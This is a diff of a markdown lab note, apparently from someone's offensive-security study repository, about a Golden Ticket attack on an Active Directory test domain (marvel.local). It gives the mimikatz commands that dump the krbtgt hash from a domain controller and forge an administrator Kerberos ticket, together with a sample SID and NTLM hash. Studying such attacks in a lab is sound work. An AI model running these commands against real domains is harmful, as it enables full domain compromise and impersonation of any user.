Ju-On/Offensive-Security/Attacking AD 4: Domain Compromise.md

 6. when in any account, we could enumerate files and even spawn new shells

 ---

 ### Performing a Golden Ticket Attack with a Pass the Ticket attack

 1. On the DC we have obtained mimikatz.exe by GentleKiwi
-2. We now aim to obtain the krbtgt account, Kerboros - ticket granting ticket account
+3. We now aim to obtain the krbtgt account, Kerboros - ticket granting ticket account
-3. This allows us to generate tickets if we have the hash of the krbtgt account
+4. This allows us to generate tickets if we have the hash of the krbtgt account
-4. With the hash of the krbtgt account we can use it to access service and resource or create a 'Golden Ticket' and use that for access.
+5. With the hash of the krbtgt account we can use it to access service and resource or create a 'Golden Ticket' and use that for access.

-on the DC, run as admin on cmd.exe, run the following:
+**From the DC, run as admin on cmd.exe and the following:**
     mimikatz.exe
     privilige::debug
     lsadump::lsa /inject /name:krbtgt

 ![image](https://github.com/user-attachments/assets/7baacf00-be56-46aa-ba61-88670fbc1574)

-**Here we have obtained the:**
+**Here we have obtained the krbtgt details, and use these to 'Pass the Hash' to create a 'Golden Ticket Session':**
 user: krbtgt
 SID of Domain: S-1-5-21-277273238-679169888-2290246510
 ntlm hash: 2617733570dcba888a76e40359f8a359
 /id: 500 (admin account)
 /ptt:  pass the ticket

-**now we generate a Golden Ticket with the above details:**
+**Generate a Golden Ticket and session with these details:**

     mimikatz # kerberos::golden /User:FakeUser123 /domain:marvel.local /sid:S-1-5-21-277273238-679169888-2290246510 /krbtgt:2617733570dcba888a76e40359f8a359 /id:500 /ptt

 ![image](https://github.com/user-attachments/assets/668c803d-d4dc-4e3d-985f-a97a78ac3667)

+**From this we have no obtained a Golden Ticket for our fakeuser in current session**